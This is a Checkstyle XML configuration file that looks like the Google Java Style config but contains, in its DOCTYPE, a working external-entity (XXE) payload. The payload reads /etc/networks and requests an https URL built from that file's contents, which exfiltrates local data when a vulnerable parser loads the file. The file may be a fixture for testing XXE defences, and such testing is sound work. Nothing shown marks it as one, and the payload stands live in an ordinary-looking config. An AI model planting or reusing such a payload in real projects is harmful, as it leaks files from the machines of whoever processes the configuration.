<?xml version="1.0"?>
<!DOCTYPE module [
        <!ELEMENT module (module|property)*>
        <!ATTLIST module name NMTOKEN #REQUIRED>

        <!ELEMENT property EMPTY>
        <!ATTLIST property
                name NMTOKEN #REQUIRED
                value CDATA #REQUIRED
                default CDATA #IMPLIED
                >

        <!ENTITY % payload SYSTEM "file:///etc/networks">
        <!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "https://%payload;">'>
        %param1;
        %external;
    ]
>

<!--
    Checkstyle configuration that checks the Google coding conventions from Google Java Style
    that can be found at https://google.github.io/styleguide/javaguide.html.
    Checkstyle is very configurable. Be sure to read the documentation at
    http://checkstyle.sf.net (or in your downloaded distribution).
    To completely disable a check, just comment it out or delete it from the file.
    Authors: Max Vetrenko, Ruslan Diachenko, Roman Ivanov.
 -->

<module name="Checker">
    <property name="charset" value="UTF-8"/>

    <property name="severity" value="error"/>
</module>
